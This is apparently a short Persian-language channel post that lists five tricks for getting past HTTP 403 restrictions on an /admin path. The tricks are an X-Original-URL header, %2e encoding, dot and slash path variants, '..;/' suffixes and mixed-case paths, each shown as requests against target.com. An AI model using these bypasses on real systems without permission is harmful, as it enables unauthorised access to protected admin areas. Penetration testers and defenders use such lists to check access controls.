2022-05-29 10:22:33
برای دور زدن خطای ۴۰۳ می توان از روش های پیشنهادی زیر استفاده کرد:
۱- استفاده از هدر X-Original-URL
مثال:
GET /admin HTTP/1.1
Host: target.com
که به صورت زیر استفاده می شود:
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
۲- افزودن %2e بعد از اولین اسلش
مثال:
http://target.com/admin => 403
که به صورت زیر استفاده می شود:
http://target.com/%2e/admin => 200
۳- افزودن نقطه و اسلش به آدرس
مثال:
http://target.com/admin => 403
که به صورت حالات زیر استفاده می شود:
http://target.com/admin/. => 200
http://target.com//admin// => 200
http://target.com/./admin/./ => 200
۴- افزودن ..;/ بعد از نام دایرکتوری
مثال:
http://target.com/admin
که به صورت زیر استفاده می شود:
http://target.com/admin..;/
۵- تغییر حروف کوچک به بزرگ
مثال:
http://target.com/admin
که به صورت زیر استفاده می شود:
http://target.com/aDmIN
@kali_outis
412 viewsSituorakso, 07:22